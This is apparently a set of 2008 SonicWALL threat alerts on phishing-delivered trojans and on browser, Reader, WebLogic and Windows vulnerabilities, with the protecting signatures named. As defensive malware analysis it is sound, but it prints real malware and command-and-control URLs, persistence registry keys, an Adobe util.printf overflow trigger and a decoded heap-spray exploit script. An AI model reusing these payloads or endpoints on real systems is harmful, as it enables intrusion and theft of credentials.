Bank of America Spam Trojan (Nov 25, 2008)

/in /by

SonicWALL UTM Research team observed a new Bank of America phishing campaign starting today Tuesday, November 25, 2008. The email pretends to be a service advertisement from Bank of America and contains a URL that leads to the demo video.

SonicWALL has received more than 1,000 e-mail copies of this phishing campaign today. The e-mail looks like following:

Subject:

  • Bank of America – Demo Account
  • Bank of America – Demo Account Setup
  • Bank of America – Always Free Customer Service Demo Account, Try for FREE
  • Bank of America – full access privileges for your DEMO account

Email body:

screenshot

The URL in the e-mail points to a phishing page containing Bank of America image. The image has the Bank of America Logo and displays the bank’s URL in the status bar when the user points at it. It also shows the video screen with a play button.

screenshot

Upon user’s click or after waiting for a few seconds the page will prompt the user to download the latest version of Adobe Flash Player 9 [Filename – Adobe_Player9.exe].

screenshot

The file that gets downloaded is a new Trojan downloader variant.

screenshot

The Trojan when executed tries to connect to silviocash.com domain and downloads a new Trojan [Filename – usp.exe] via HTTP.

At the time of writing this Alert, there was very low AntiVirus detection rate for both malware executables.

SonicWALL Gateway AntiVirus provides protection against these malware executables via GAV: Bofam (Trojan) and GAV: Bofam_2 (Trojan) signatures.

Opera Browser File URI Buffer Overflow (Nov 20, 2008)

/in /by

Opera is a web browser similar to Microsoft Internet Explorer and Mozilla Firefox. It is capable of displaying web pages and executing web applications. It can also interpret and render many types of Internet content, including various versions of HTML, XML, CSS (Cascade Style Sheet), JavaScript, various graphic formats and so on. Opera is made available for Windows, Macintosh, Unix and Linux based platforms.

Uniform Resource Identifier scheme (URI) is a very common naming structure that can be parsed by Opera. An example of an URI is http://www.sonicwall.com. These URIs can be embedded into any HTML web page to link to the other web pages.

There is a buffer overflow vulnerability in Opera Web browser. The vulnerability occurs when the browser tries to parse a very long URI starts with file://. The string may overwrite a fixed sized heap-based buffer and corrupt the memory, or even lead the execution of the injected code.

SonicWALL UTM team has developed a signature to block any attack addressing this issue, which is listed as bellow:

  • 3641 Opera Browser File URI Handling BO Attempt

There are also some existing signatures that can detect most of the suspicious shell codes in a web page, which are listed as bellow. They will largely eliminate the possibility of the attacks that try to inject and execute shell code by exploiting this vulnerability.

  • 3124 Javascript Code Injection Attempt (Win/Linux)
  • 3127 Javascript Code Injection Attempt (Mac)
  • 4096 Mozilla Firefox Wrapped JavaScript Code Execution
  • 4665 Javascript Code Injection Attempt (Win/Linux) 2
  • 4701 Javascript Code Injection Attempt (Win/Linux) 3
  • 4744 Javascript Code Injection Attempt (Win/Linux) 4
  • 4760 Unicode Javascript Code Injection Attempt 1
  • 4761 Unicode Javascript Code Injection Attempt 2
  • 5051 Javascript Code Injection Attempt (Win/Linux) 5

There will be another article summarizes these JavaScript Code Injection signatures soon.

UPS Invoice Spam (Nov 21, 2008)

/in /by

SonicWALL UTM Research team observed a new wave of the on-going UPS invoice spam campaign starting Thursday, November 20, 2008. The email has a zip archived attachment which contains the new ZBot Trojan variant.

SonicWALL has received more than 1,000 e-mail copies of this malware till date. The e-mail looks like following:

Attachment: UPSInfo.zip (contains UPSInfo.exe)

Subject: Your Tracking # [12-digit number]

Email Body:
————————
Sorry, we were not able to deliver postal package you sent on November the 1st in time because the recipient?s address is not correct.

Please print out the invoice copy attached and collect the package at our office. If you do not receive package in ten days you will have to pay 36$ per day.

Your UPS
————————

The executable file inside the zip attachment has an icon disguised as a Adobe PDF file and it looks like following:

screenshot

The Trojan when executed performs following host level activity:

  • Creates a directory twain_32 in C:Documents and SettingsLocalServiceApplication Data and C:WINDOWSsystem32
  • Drops a copy of itself as C:WINDOWSsystem32twext.exe
  • Creates two files C:WINDOWSsystem32twain_32local.ds and C:WINDOWSsystem32twain_32user.ds

It modifies the following Registry key for running twext.exe:

  • HKLMSOFTWAREMicrosoftWindows NTCurrentVersionWinlogonUserinit: “C:WINDOWSsystem32userinit.exe,C:WINDOWSsystem32twext.exe,”

It also tries connect and download an encrypted configuration file from the following URL:

  • pavelmoous.ru/pavel/conf.bin

The Trojan is also known as Trojan-Spy.Win32.Zbot.gsv [Kaspersky], W32/Trojan3.LA [F-Prot], and TR/Spy.ZBot.gsv [AntiVir]

SonicWALL Gateway AntiVirus provides protection against this malware via GAV: Zbot.GSV (Trojan) signature.

Airline Ticket Spam (Nov 14, 2008)

/in /by

SonicWALL UTM Research team observed a new spam campaign starting on Thursday, November 13, 2008 which involves a fake e-mail pretending to be arriving from an Airline Company and containing Airline Ticket. The email has a zip archived attachment which contains the new Downloader Trojan.

The e-mail looks like following:

Attachment: ticket.zip (contains ticket.doc .exe)

Subject:

  • Your flight ticket
  • Your ticket from Delta Airlines
  • Your ticket from Alaska Airlines
  • Your ticket from United Airlines
  • Your airplane ticket

Email Body:
————————
Dear Holder

Thank you for using our new service “Buy flight ticket Online” on our website. Your account has been created:

Your login: your-email-address
Your password: random-string

Your credit card has been charged for $WXX.YY (where W=4 and X,Y = 0-9)
We would like to remind you that whenever you order tickets on our website you get a discount of 10%!
Attached to this message is the purchase Invoice and the flight ticket.
To use your ticket, simply print it on a color printed, and you are set to take off for the journey!

Kind regards,
Airline Name (E.g. United, Alaska etc)
————————

The executable file inside the zip attachment has an icon disguised as a Microsoft Word document and it looks like following:

screenshot

The Trojan when executed performs following host level activity:

  • Creates a dirctory as C:Program FilesMicrosoft Common
  • Drops a copy of itself as C:Program FilesMicrosoft Commonwuauclt.exe
  • Deletes the original copy of the file
  • Creates multiple .sys files in SYSTEM32DRIVERS directory
  • Creates multiple .tmp files which later gets deleted

It creates the following Registry key for itself:

  • HKLMSOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionsexplorer.exeDebugger: “C:Program FilesMicrosoft Commonwuauclt.exe”

It also tries connect and download files from the following URLs:

  • furely.ru/load2/ld.php?v=[REMOVED]168650&n=1&uid=1 [Downloads msan1.exe – detected as GAV: Wigon.HE (Trojan)]
  • kexlup.ru/loadx/ld.php?v=[REMOVED]75168650&n=1&uid=1 [connection failed]

The Trojan is also known as Trojan.Win32.Agent.amzt [Kaspersky], W32/Trojan3.JD [F-Prot], and TR/Dldr.iBill.BP [AntiVir]

SonicWALL Gateway AntiVirus provides protection against this malware via GAV: Agent.AMZT (Trojan) signature [8,344 hits recorded].

MS08-069 MS XML Core Vulnerability (Nov 12, 2008)

/in /by

Microsoft has released an advisory for its XML processing framework during this month’s Microsoft Patch Day. It is named MSXML or Microsoft XML Core services. The framework may be used by developers in third party applications as well as applications shipped with the operating system. The most popular application using this framework is Internet Explorer, which can transform XML files using XSL stylesheets.

The XML Core Services package contains the DOMDocument ActiveX object which represents the top level of the XML source. Document Type Definition (DTD) is one of several SGML and XML schema languages that DOMDocument can parse. DOMDocument includes members for retrieving and creating all other XML objects. One of those member methods, loadXML, can load an XML document using the supplied string. The supplied string can contain external DTD, which resides in a separate document and is referred by the URI of the DTD file.

An information disclosure vulnerability exists in the DOMDocument ActiveX object control implementation. The flaw is due to a design weakness in the way XML core service handles error checks for external DTDs. Normally, one domain cannot access other different domains for information. However, the vulnerable versions of MSXML allow parameter entities in external DTDs to reference data on a different domain. A successful exploitation would disclose cross-domain potential confidential information to the attacker.

To protect SonicWALL customers from being attacked by any attacks addressing this vulnerability, the SonicWALL UTM team has created and released the following IPS signatures at the same day as the advisory was released.

  • 1210 MS XML Core Services parseError Info Disclosure Attempt 2 (MS08-069)
  • 1209 MS XML Core Services parseError Info Disclosure Attempt 1 (MS08-069)

Adobe Reader util.printf Buffer Overflow (Nov 7, 2008)

/in /by

Adobe Reader (formerly Acrobat Reader) is a ubiquitous application for viewing PDF (Portable Document Format) documents.

Since version 4.0, Acrobat includes JavaScript functionality allowing for customization and extensibility. Acrobat JavaScript is an extension of the core JavaScript which adds Acrobat-specific classes that enable the author to manage document related tasks. These classes include app, dbg, console, SOAP, ADBC, util, etc.

The util object provides the printf method which takes as argument, a format string specifier and values to be formatted; then it returns the corresponding formatted string. For example:

   var num = 12345
   util.printf(“%.2f”, num)

We get 12345.00.

There exists a stack buffer overflow in Adobe Reader when parsing specially crafted PDF files. Specifically, the vulnerability is caused due to a boundary error when parsing format strings containing a floating point specifier in the “util.printf()” JavaScript function. If the format string contains specific width for a floating point number, the code will copy the padding spaces (0x20) to a stack-allocated buffer with fixed length. Supplying an overly large width will overflow the buffer with spaces and overwrite SEH. For Example:

   var num = 1.2
   util.printf(“%5000f”, num)

This causes the byte 0x20 to be copied 5000 times on the stack and overflows the buffer.

An attacker can exploit this vulnerability by enticing a user to open a PDF document, which contains a malformed floating point specifier in the “util.printf()” JavaScript function. Successful exploitation would allow for arbitrary code injection and execution with the privileges of the currently logged in user. Code injection that does not result in execution would terminate the application due to memory corruption.

To evade the detection of the attack an attacker might use obfuscate techniques. For example, one of the PDF files exploiting this vulnerability contains the following FlateDecode stream:

x48x89xACx57x6Dx8Bx14x31x0CxFEx2ExF8x27x0Ex06xEE
x10x64xB6x69xD3x19xFCxE4xEEx9ExFFx43x8Ex05x05xF1
xC4x53x7FxBFx4DxFAx96xA4x5DxCFx13x61x76xE8xA6xE9
xD3xE4xC9x4Bx3Bx97x5Fx1FxBFxDCxFExFCx7Ax79x7AxF8
xF8xEDx72x7Bx73xF3xE6x66x49xBFx88x0Bx1Ex78xE0x16
 […truncated]
xE3xC3xEDx8FxEFx3Fx2Fx77xEFx7Ex0Bx30x00xDAxDAxDC
xBB

Which would be decoded as:

function main() {

var sccs = unescape(“%u03eb%ueb59%ue805%ufff8[…truncated]“);

var bgbl = unescape(“%u0A0A%u0A0A”);
var slspc = 20 + sccs.length;
while(bgbl.length < slspc) bgbl += bgbl;
var fblk = bgbl.substring(0,slspc);
var blk = bgbl.substring(0,bgbl.length – slspc);
while(blk.length + slspc < 0x60000) blk = blk + blk + fblk; var mmy = new Array();
for(i = 0; i < 1200; i++){ mmy[i] = blk + sccs } var nm = 12;
for(i = 0; i < 18; i++){ nm = nm + "9"; }
for(i = 0; i < 276; i++){ nm = nm + "8"; } util.printf(“%45000f”, nm); this.closeDoc(true);
}

app.setTimeOut(“main()”, 5000);

SonicWALL Gateway AntiVirus provides protection against this vulnerability via GAV: PDF.util.printf.AS (Exploit) and PDF.util.printf.AS_2 (Exploit) signatures.

Obama Speech Trojan (Nov 5, 2008)

/in /by

SonicWALL UTM Research team observed a new spam campaign which uses yesterday’s US election as a social engineering mechanism to install a Trojan.

The email appears to be from news@bbc.com with the subject “Priorities for the New President”. The email contents is

——————
Barack Obama Elected 44th President of United States

Barack Obama, unknown to most Americans just four years ago, will become the 44th president and the first African-American president of the United States.
Watch His amazing speech at November 5!

Proceed to the election results news page>>

2008 American Government Official Website
This site delivers information about current U.S. Foreign policy and about American life and culture.
—————

Some other subjects used are:

  • Barack Obama wins
  • Can Obama win popular vote but lose election?
  • Did Obama Win Yet?
  • Election 2008: Time lapse of U.S. counties
  • Election Center 2008 – Election Results
  • Election Night Results
  • Fear of a Black President
  • Obama win an Electoral College majority
  • Obama win Defined by Race
  • USA Election 2008 Results
  • World Welcomes Obama’s Win

Link goes to one of these fast-fluxed domains (bfiinwach.com, gerimumsoe.com, lopbiuemis.com,vcoenutrmsi.com, wconlinenrue.com)

If the link is clicked a Adobe_flash9.exe is served to the user. It is 31,232 bytes in size and is compressed by ASPACK executable packer. It drops itself in %Windir%9129837.exe and drops a rootkit in %Windir%new_drv.sys, which it installs as a new kernel-mode driver.

It also modifies the registry: 

 [HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun] ttool = "%Windir%9129837.exe"

so that 9129837.exe runs every time Windows starts

Trojan then connects to HTTP on 91.203.93.57 (which is hosted in Ukraine) and issues the following GET requests:

  • cgi-bin/options.cgi?user_id=3311905101&version_id=5&passphrase=fkjvhsdvlksdhvlsd&socks=22539&version=125&crc=00000000
  • cgi-bin/cmd.cgi?user_id=3311905101&version_id=5&passphrase=fkjvhsdvlksdhvlsd&socks=22539&version=125&crc=00000000

It is exfiltrating stolden userids and passwords to the above IP.

The Trojan is also known as TrojanSpy:Win32/Ursnif.gen!D (Micorosft) and Mal/Heuri-E (Sophos).

SonicWALL has released a GAV signature to protect against this threat: GAV: Games.C (Trojan)

WebLogic Apache Connector Vulnerability (Oct 30, 2008)

/in /by

Oracle BEA WebLogic Server is a multi-tier Java Application Server platform. In a two and three-tier application architecture, a web server is used to receive forms or HTTP requests, then pass them to application servers, which perform actual processing. A connector software refers to the component used by web server to communicate with the application server. Oracle BEA WebLogic Server ships with a connector, named mod_wl, for Apache HTTP server.

Normally an HTTP POST request is sent in one stream, unless the HTTP header Transfer-Encoding is specified. A common value of the Transfer-Encoding header is “chunked”.

There exists a buffer overflow vulnerability in Oracle BEA WebLogic Server’s connector software for Apache HTTP server. Specifically, the vulnerability is due to improper parsing of HTTP Transfer-Encoding headers sent to the Apache Web server. When a Transfer-Encoding header containing unrecognized value is received, the connector software of WebLogic Server copies the header value into a stack buffer of fixed size using a sprintf() function. It has been observed that the vulnerable code does not verify the length of the string before copying it to the buffer.

A remote unauthenticated attacker could exploit this vulnerability by sending a crafted HTTP request containing overly long Transfer-Encoding value to the vulnerable WebLogic connector software. Successful exploitation would result in code injection and execution with the privileges of the service, normally “System” on Windows platform.

SonicWALL has released an IPS signature that will detect and prevent attacks targeting this vulnerability. The signature to address this vulnerability is:

  • 3596 WEB-ATTACKS Transfer-Encoding HTTP Header BO Attempt

New ZBot Trojan variant (Oct 28, 2008)

/in /by

SonicWALL UTM Research team observed a new ZBot variant being spammed in the wild using Angelina Jolie video spam campaign starting on Saturday, October 25, 2008 which involves a fake e-mail message pretending to contain Angelina Jolie video. The email has a zip archived attachment which contains the new ZBot variant.

SonicWALL has received more than 10,000 e-mail copies of this malware so far. The e-mail looks like following:

Attachment: anjelina_video.zip (contains anjelina_video.exe)

Subject: New Anje1lna Jo1ie p0rn

Email Body:
————————
Anje1lna Jo1ie p0rn video, file attached, watch him
————————

Starting October 27, 2008 the spam campaign changed to “new eCard” spam which involves a fake e-mail message pretending to contain an ecard. The email has a zip archived attachment which contains the new ZBot variant.

SonicWALL has received more than 5,000 e-mail copies of this malware so far. The e-mail looks like following:

Attachment: ecard.zip (contains ecard.exe)

Subject: You have received an eCard

Email Body:
————————
Good day.

You have received an eCard
To pick up your eCard open attached file
We hope you enjoy you eCard.
Thank You!
————————

The Trojan when executed drops following malicious files in the windows system folder:

  • twain_32local.ds
  • twain_32user.ds
  • twext.exe

It modifies the following registry keys to ensure that twext.exe executes on system startup:

  • HKLMSOFTWAREMicrosoftWindows NTCurrentVersionWinlogonUserinit = “(System Folder Path)userinit.exe,(System Folder Path)twext.exe,”

It also tries to connect to opokimoki.com domain and sends following HTTP request:

  • GET /los/cfn.bf

The Trojan is also known as Trojan-Spy.Win32.Zbot.fql [Kaspersky], Troj/Agent-IAZ [Sophos], and TrojanSpy:Win32/Zbot.gen!C [Microsoft]

SonicWALL Gateway AntiVirus provided proactive protection against this new Zbot variant via GAV: Zbot.FME (Trojan) signature [809,401 hits recorded starting Oct 25, 2008].

screenshot

MS08-067 Server Service Buffer Overflow (Oct 23, 2008)

/in /by

A vulnerability has been reported in the Server service of most versions of Microsoft Windows. This service facilitates file, print, and named-pipe sharing over the network for Windows-based computers. These remote access facilities are often utilized for Remote Procedure Calls (RPC).

Calling RPC methods on a remote machine entails opening a named pipe as a file and accessing the RPC interface through a Universally Unique Identifier (UUID). Some Microsoft operating systems do not require authentication to access several named pipes. The srvsvc pipe is an alias to the ntsvcs named pipe and can be accessed by several other aliases. The srvsvc interface is registered with the UUID “4B324FC8-1670-01D3-1278-5A47BF6EE188”. The interface exposes a set of functions that enumerate and configure shares, sessions and other resources on the server. Two RPC functions that are provided by the SRVSVC interface are listed below:

  • NetprPathCanonicalize
  • NetprPathCompare

The function NetprPathCanonicalize, with opcode 31, normalizes a path name by converting slash characters to backslash characters and removing directory traversal sequences. Another RPC function, NetprPathCompare, with opcode 32, internally calls the NetprPathCanonicalize function to normalize path names before comparing them. Thus RPC calls to NetprPathCompare also invoke NetprPathCanonicalize.

The server side implementation of NetprPathCanonicalize RPC function is provided by the library NETAPI32.DLL. The calling syntax of this function is as follows:

long NetprPathCanonicalize(
[in] [string] [unique] wchar_t *ServerName,
[in] [string] [ref] wchar_t *PathName,
[in] long OutBufLen;
[in] [string] [ref] wchar_t *Prefix,
[in] [out] [ref] long *PathType;
[in] long PathFlags;
);

A stack buffer overflow vulnerability exists in the way the Server service processes the PathName argument to the NetprPathCanonicalize function. The affected code fails to properly handle cases where directory traversal sequences result in traversing past the root path as in the following case:

/pathpart1/../../pathpart2

In such cases, the code will internally copy the string, less the traversal sequence and the path which precedes it into a calculated destination buffer. The destination buffer for the copied string is found by searching for the first slash character which precedes the traversal sequence. Normally, this ends up as being the beginning of the source string. Such that the process of normalizing the first traversal in the above example will end up with the following string:

/../pathpart2

Since the next traversal sequence that is to be normalized is not preceded by a path, the search for the first slash character preceding this sequence will incorrectly end up at a memory location in front of the designated buffer. Such that, if a slash character happens to exist on the stack in a vulnerable location, then the source string will be copied into that location.

It has been observed that the stack can be manipulated in a favourable way by the attacker by calling the affected RPC function twice wherein the second time it is called, the copy will overwrite the designated stack buffer.

A remote attacker can exploit this vulnerability by sending specially crafted RPC requests to an affected system. Successful exploitation may result in execution of arbitrary code on the target host with System privileges. A denial of service condition may ensue in cases of unsuccessful attacks.

SonicWALL has released two signatures which will detect and block generic exploitation attempts of this vulnerability. The following IPS signatures have been deployed to address this issue:

  • 1160 – SRVSVC NetPathCanonicalize BO Attempt 1 (MS08-067)
  • 1161 – SRVSVC NetPathCanonicalize BO Attempt 2 (MS08-067)
  • 1174 – SRVSVC NetPathCanonicalize BO Attempt 3 (MS08-067)
  • 1178 – SRVSVC NetPathCanonicalize BO Attempt 4 (MS08-067)
  • 1186 – SRVSVC NetPathCanonicalize BO Exploit 1 (MS08-067)